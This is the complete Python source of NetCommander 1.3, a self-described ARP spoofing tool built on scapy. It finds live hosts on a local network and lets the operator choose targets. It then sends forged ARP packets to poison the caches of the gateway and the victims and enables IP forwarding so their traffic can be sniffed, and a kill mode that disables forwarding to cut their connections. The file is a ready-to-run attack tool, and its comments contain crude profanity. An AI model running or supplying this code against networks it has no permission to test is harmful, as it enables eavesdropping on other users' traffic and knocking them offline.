netcmd.py

1. #!/usr/bin/python
2. # This file is part of NetCommander.
3. #
4. # Copyright(c) 2010-2011 Simone Margaritelli
5. # evilsocket@gmail.com
6. # http://www.evilsocket.net
7. # http://www.backbox.org
8. #
9. # This file may be licensed under the terms of of the
10. # GNU General Public License Version 2 (the ``GPL'').
11. #
12. # Software distributed under the License is distributed
13. # on an ``AS IS'' basis, WITHOUT WARRANTY OF ANY KIND, either
14. # express or implied. See the GPL for the specific language
15. # governing rights and limitations.
16. #
17. # You should have received a copy of the GPL along with this
18. # program. If not, go to http://www.gnu.org/licenses/gpl.html
19. # or write to the Free Software Foundation, Inc.,
20. # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
21. import logging
22. import time
23. import os
24. import sys
25. import atexit
26. import re
27. from optparse import OptionParser
28. import warnings
29.  
30. # ignore deprecation warnings from scapy inclusion
31. warnings.filterwarnings( "ignore", category = DeprecationWarning )
32. # disable scapy warnings about ipv6 and shit like that
33. logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
34.  
35. from scapy.all import srp,Ether,ARP,conf,sendp,ltoa,atol
36.  
37. class NetCmd:
38.  
39.   def __bit_count( self, n ):
40.     bits = 0
41.     while n:
42.       bits += n & 1
43.       n   >>= 1
44.     return bits
45.  
46.   def __set_forwarding( self, status ):
47.     # Mac OS X
48.     if sys.platform == 'darwin':
49.       p = os.popen( "sysctl -w net.inet.ip.forwarding=%s" % '1' if status == True else '0' )
50.       output = p.readline()
51.       p.close()
52.  
53.       if status and not re.match( r'net\.inet\.ip\.forwarding:\s+\d\s+\->\s+\d', output ):
54.         raise Exception( "Unexpected output '%s' while turning ip forwarding." % output )
55.     # Linux
56.     else:
57.       if not os.path.exists( '/proc/sys/net/ipv4/ip_forward' ):
58.         raise Exception( "'/proc/sys/net/ipv4/ip_forward' not found, this is not a compatible operating system." )
59.      
60.       fd = open( '/proc/sys/net/ipv4/ip_forward', 'w+' )
61.       fd.write( '1' if status == True else '0' )
62.       fd.close()
63.  
64.   def __preload_mac_table( self ):
65.     if os.path.exists( 'mac-prefixes' ):
66.       print "@ Preloading MAC table ..."
67.  
68.       fd = open( 'mac-prefixes' )
69.       for line in iter(fd):
70.         ( prefix, vendor ) = line.strip().split( ' ', 1 )
71.         self.mac_prefixes[prefix] = vendor
72.  
73.       fd.close()
74.  
75.   def __find_mac_vendor( self, mac ):
76.     mac = mac.replace( ':', '' ).upper()[:6]
77.     try:
78.       return self.mac_prefixes[mac]
79.     except KeyError as e:
80.       return ''  
81.  
82.   def find_alive_hosts( self ):
83.     self.gateway_hw = None
84.     self.endpoints  = []
85.    
86.     print "@ Searching for alive network endpoints ..."
87.  
88.     # broadcast arping ftw
89.     ans,unans = srp( Ether( dst = "ff:ff:ff:ff:ff:ff" ) / ARP( pdst = self.network ),
90.                      verbose = False,
91.                      filter  = "arp and arp[7] = 2",
92.                      timeout = 2,
93.                      iface_hint = self.network )
94.  
95.     for snd,rcv in ans:
96.       if rcv.psrc == self.gateway:
97.         self.gateway_hw = rcv.hwsrc
98.       else:
99.         self.endpoints.append( ( rcv.hwsrc, rcv.psrc ) )
100.      
101.     if self.endpoints == [] and not self.all:
102.       raise Exception( "Could not find any network alive endpoint." )
103.  
104.   def __init__( self, interface, gateway = None, network = None, kill = False, all = False ):
105.     # scapy, you're pretty cool ... but shut the fuck up bitch!
106.     conf.verb = 0
107.  
108.     self.interface    = interface
109.     self.network      = network
110.     self.targets      = []
111.     self.gateway      = gateway
112.     self.all          = all
113.     self.gateway_hw   = None
114.     self.packets      = []
115.     self.restore      = []
116.     self.endpoints    = []
117.     self.mac_prefixes = {}
118.  
119.     if not os.geteuid() == 0:
120.       raise Exception( "Only root can run this script." )
121.  
122.     self.__preload_mac_table()
123.    
124.     print "@ Searching for the network gateway address ..."
125.  
126.     # for route in conf.route.routes:
127.     for net, msk, gw, iface, addr in conf.route.routes:
128.       # found a route for given interface
129.       if iface == self.interface:
130.         network = ltoa( net )
131.         # compute network representation if not yet done
132.         if network.split('.')[0] == addr.split('.')[0]:
133.           bits = self.__bit_count( msk )
134.           self.network = "%s/%d" % ( network, bits )
135.         # search for a valid network gateway
136.         if self.gateway is None and gw != '0.0.0.0':
137.           self.gateway = gw
138.    
139.     if self.gateway is not None and self.network is not None:
140.       print "@ Gateway is %s on network %s ." % ( self.gateway, self.network )
141.     else:
142.       raise Exception( "Could not find any network gateway." )
143.  
144.     self.find_alive_hosts()
145.  
146.     print "@ Please choose your target :"
147.     choice = None
148.    
149.     if all:
150.       self.targets = self.endpoints
151.     else:
152.       while choice is None:
153.         for i, item in enumerate( self.endpoints ):
154.           ( mac, ip ) = item
155.           vendor      = self.__find_mac_vendor( mac )
156.           print "  [%d] %s %s %s" % ( i, mac, ip, "( %s )" % vendor if vendor else '' )
157.         choice = raw_input( "@ Choose [0-%d] (* to select all, r to refresh): " % (len(self.endpoints) - 1) )
158.         try:
159.           choice = choice.strip()
160.           if choice == '*':
161.             self.targets = self.endpoints
162.           elif choice.lower() == 'r':
163.             choice = None
164.             self.find_alive_hosts()
165.           else:
166.             self.targets.append( self.endpoints[ int(choice) ] )
167.         except Exception as e:
168.           print "@ Invalid choice!"
169.           choice = None
170.  
171.     self.craft_packets()
172.      
173.     if not kill:
174.       print "@ Enabling ipv4 forwarding system wide ..."
175.       self.__set_forwarding( True )
176.     else:
177.       print "@ Disabling ipv4 forwarding system wide to kill target connections ..."
178.       self.__set_forwarding( False )
179.    
180.     atexit.register( self.restore_cache )
181.  
182.   def craft_packets( self ):
183.     # craft packets to accomplish a full forwarding:
184.     #   gateway -> us -> target
185.     #   target  -> us -> gateway
186.     for target in self.targets:
187.       self.packets.append( Ether( dst = self.gateway_hw ) / ARP( op = "who-has", psrc = target[1],    pdst = self.gateway ) )
188.       self.packets.append( Ether( dst = target[0] )       / ARP( op = "who-has", psrc = self.gateway, pdst = target[1] ) )
189.       # and packets to restore the cache later
190.       self.restore.append( Ether( src = target[0],       dst = self.gateway_hw ) / ARP( op = "who-has", psrc = target[1],    pdst = self.gateway ) )
191.       self.restore.append( Ether( src = self.gateway_hw, dst = target[0] )       / ARP( op = "who-has", psrc = self.gateway, pdst = target[1] ) )
192.    
193.   def restore_cache( self ):
194.     os.write( 1, "\n@ Restoring ARP cache " )
195.     for i in range(5):
196.       for packet in self.restore:
197.         sendp( packet, iface_hint = self.gateway )
198.       os.write( 1, '.' )
199.       time.sleep(1)
200.     os.write( 1, "\n" )
201.  
202.     self.__set_forwarding( False )
203.    
204.   def spoof( self ):
205.     if self.all and self.targets != self.endpoints:
206.       self.targets = self.endpoints
207.       self.craft_packets()
208.  
209.     for packet in self.packets:
210.       sendp( packet, iface_hint = self.gateway )
211.  
212. try:
213.   print "\n\tNetCommander 1.3 - An easy to use arp spoofing tool.\n \
214. \tCopyleft Simone Margaritelli <evilsocket@gmail.com>\n \
215. \thttp://www.evilsocket.net\n\thttp://www.backbox.org\n";
216.          
217.   parser = OptionParser( usage = "usage: %prog [options]" )
218.  
219.   parser.add_option( "-I", "--iface",   action="store",      dest="iface",   default=conf.iface, help="Network interface to use if different from the default one." );
220.   parser.add_option( "-N", "--network", action="store",      dest="network", default=None,       help="Network to work on." );
221.   parser.add_option( "-G", "--gateway", action="store",      dest="gateway", default=None,       help="Gateway to use." );
222.   parser.add_option( "-K", "--kill",    action="store_true", dest="kill",    default=False,      help="Kill targets connections instead of forwarding them." )
223.   parser.add_option( "-D", "--delay",   action="store",      dest="delay",   default=5,          help="Delay in seconds between one arp packet and another, default is 5." )
224.   parser.add_option( "-A", "--all",     action="store_true", dest="all",     default=False,      help="Keep spoofing and spoof all connected and later connected interfaces." )
225.  
226.   (o, args) = parser.parse_args()
227.  
228.   ncmd = NetCmd( o.iface, o.gateway, o.network, o.kill, o.all )
229.  
230.   if not o.kill:
231.     os.write( 1, "@ Spoofing, launch your preferred network sniffer to see target traffic " )
232.   else:
233.     os.write( 1, "@ Killing target connections " )
234.  
235.   slept = 0
236.   while 1:
237.     ncmd.spoof()
238.     os.write( 1, '.' )
239.     time.sleep( o.delay )
240.     slept += 1
241.  
242.     if o.all and slept > 10:
243.       ncmd.restore_cache()
244.       ncmd.find_alive_hosts()
245.       slept = 0
246.  
247. except KeyboardInterrupt:
248.   pass
249. except Exception as e:
250.   print "@ ERROR : %s" % e